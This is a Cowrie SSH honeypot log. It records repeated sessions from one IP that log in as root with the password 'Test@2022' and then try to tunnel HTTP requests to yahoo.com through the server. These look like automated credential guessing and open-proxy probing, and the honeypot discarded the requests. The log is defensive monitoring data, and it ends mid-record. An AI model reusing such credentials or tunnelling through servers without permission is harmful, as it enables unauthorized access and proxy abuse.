{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:25.504940Z","src_ip":"213.209.150.239","session":"c35c932ff25e"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:25.552777Z","src_ip":"213.209.150.239","session":"c35c932ff25e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":52182,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ac017d35813","protocol":"ssh","message":"New connection: 213.209.150.239:52182 (1.2.3.4:22) [session: 4ac017d35813]","sensor":"my-vps","timestamp":"2025-08-26T00:55:25.599251Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:25.599966Z","src_ip":"213.209.150.239","session":"4ac017d35813"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:25.647181Z","src_ip":"213.209.150.239","session":"4ac017d35813"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:25.882042Z","src_ip":"213.209.150.239","session":"4ac017d35813"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":341,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:341","sensor":"my-vps","timestamp":"2025-08-26T00:55:25.930114Z","session":"4ac017d35813"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:25.977528Z","src_ip":"213.209.150.239","session":"4ac017d35813"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":10176,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:10176","sensor":"my-vps","timestamp":"2025-08-26T00:55:26.113618Z","session":"4ac017d35813"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:26.161513Z","src_ip":"213.209.150.239","session":"4ac017d35813"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:26.209556Z","src_ip":"213.209.150.239","session":"4ac017d35813"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":52224,"dst_ip":"1.2.3.4","dst_port":22,"session":"af54e7bf9d11","protocol":"ssh","message":"New connection: 213.209.150.239:52224 (1.2.3.4:22) [session: af54e7bf9d11]","sensor":"my-vps","timestamp":"2025-08-26T00:55:26.255656Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:26.265932Z","src_ip":"213.209.150.239","session":"af54e7bf9d11"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:26.303263Z","src_ip":"213.209.150.239","session":"af54e7bf9d11"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:26.537309Z","src_ip":"213.209.150.239","session":"af54e7bf9d11"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":21374,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:21374","sensor":"my-vps","timestamp":"2025-08-26T00:55:26.585232Z","session":"af54e7bf9d11"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:26.632954Z","src_ip":"213.209.150.239","session":"af54e7bf9d11"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":11105,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:11105","sensor":"my-vps","timestamp":"2025-08-26T00:55:26.769301Z","session":"af54e7bf9d11"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:26.816277Z","src_ip":"213.209.150.239","session":"af54e7bf9d11"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:26.864021Z","src_ip":"213.209.150.239","session":"af54e7bf9d11"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":52272,"dst_ip":"1.2.3.4","dst_port":22,"session":"7925403049f1","protocol":"ssh","message":"New connection: 213.209.150.239:52272 (1.2.3.4:22) [session: 7925403049f1]","sensor":"my-vps","timestamp":"2025-08-26T00:55:26.910168Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:26.911184Z","src_ip":"213.209.150.239","session":"7925403049f1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:26.958604Z","src_ip":"213.209.150.239","session":"7925403049f1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:27.194075Z","src_ip":"213.209.150.239","session":"7925403049f1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":21192,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:21192","sensor":"my-vps","timestamp":"2025-08-26T00:55:27.242373Z","session":"7925403049f1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:27.289587Z","src_ip":"213.209.150.239","session":"7925403049f1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":7568,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:7568","sensor":"my-vps","timestamp":"2025-08-26T00:55:27.425454Z","session":"7925403049f1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:27.472572Z","src_ip":"213.209.150.239","session":"7925403049f1"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:27.520725Z","src_ip":"213.209.150.239","session":"7925403049f1"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":52321,"dst_ip":"1.2.3.4","dst_port":22,"session":"36993af8ab6d","protocol":"ssh","message":"New connection: 213.209.150.239:52321 (1.2.3.4:22) [session: 36993af8ab6d]","sensor":"my-vps","timestamp":"2025-08-26T00:55:27.566860Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:27.567569Z","src_ip":"213.209.150.239","session":"36993af8ab6d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:27.616156Z","src_ip":"213.209.150.239","session":"36993af8ab6d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:27.851136Z","src_ip":"213.209.150.239","session":"36993af8ab6d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":24767,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:24767","sensor":"my-vps","timestamp":"2025-08-26T00:55:27.899168Z","session":"36993af8ab6d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:27.946791Z","src_ip":"213.209.150.239","session":"36993af8ab6d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":11622,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:11622","sensor":"my-vps","timestamp":"2025-08-26T00:55:28.081523Z","session":"36993af8ab6d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:28.128592Z","src_ip":"213.209.150.239","session":"36993af8ab6d"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:28.176445Z","src_ip":"213.209.150.239","session":"36993af8ab6d"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":52347,"dst_ip":"1.2.3.4","dst_port":22,"session":"16b1c75b6aca","protocol":"ssh","message":"New connection: 213.209.150.239:52347 (1.2.3.4:22) [session: 16b1c75b6aca]","sensor":"my-vps","timestamp":"2025-08-26T00:55:28.232181Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:28.233099Z","src_ip":"213.209.150.239","session":"16b1c75b6aca"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:28.289625Z","src_ip":"213.209.150.239","session":"16b1c75b6aca"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:28.573704Z","src_ip":"213.209.150.239","session":"16b1c75b6aca"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":28539,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:28539","sensor":"my-vps","timestamp":"2025-08-26T00:55:28.631245Z","session":"16b1c75b6aca"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:28.688202Z","src_ip":"213.209.150.239","session":"16b1c75b6aca"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":30922,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:30922","sensor":"my-vps","timestamp":"2025-08-26T00:55:28.843074Z","session":"16b1c75b6aca"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:28.900470Z","src_ip":"213.209.150.239","session":"16b1c75b6aca"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:28.958300Z","src_ip":"213.209.150.239","session":"16b1c75b6aca"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":52397,"dst_ip":"1.2.3.4","dst_port":22,"session":"1897fe912c5c","protocol":"ssh","message":"New connection: 213.209.150.239:52397 (1.2.3.4:22) [session: 1897fe912c5c]","sensor":"my-vps","timestamp":"2025-08-26T00:55:29.013643Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:29.014482Z","src_ip":"213.209.150.239","session":"1897fe912c5c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@o